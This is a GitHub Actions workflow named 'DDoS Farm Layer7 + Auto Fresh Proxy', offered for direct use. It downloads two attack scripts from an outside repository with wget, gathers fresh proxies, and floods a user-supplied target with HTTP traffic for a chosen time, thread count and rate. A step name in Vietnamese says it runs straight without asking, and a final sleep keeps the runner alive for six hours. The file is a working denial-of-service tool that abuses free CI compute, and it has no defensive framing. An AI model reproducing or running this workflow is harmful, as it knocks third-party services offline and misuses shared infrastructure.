name: DDoS Farm Layer7 + Auto Fresh Proxy

on:
  workflow_dispatch:
    inputs:
      target:
        required: true
      time:
        default: '300'
      threads:
        default: '30'
      rate:
        default: '90'

jobs:
  attack:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/setup-node@v4
        with: { node-version: 20 }
      - uses: actions/setup-python@v5
        with: { python-version: '3.11' }

      - name: Download tools
        run: |
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/cf.js
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/proxy.js
          chmod +x *

      - name: Lấy proxy tươi
        run: |
          npm install hpack cluster
          node proxy.js

      - name: Bắn Layer7 (CHẠY THẲNG KHÔNG HỎI)
        run: |
          node cf.js ${{ inputs.target }} ${{ inputs.time }} ${{ inputs.threads }} ${{ inputs.rate }} proxy.txt --full --cache --debug

      - name: Keep alive
        run: sleep 21600
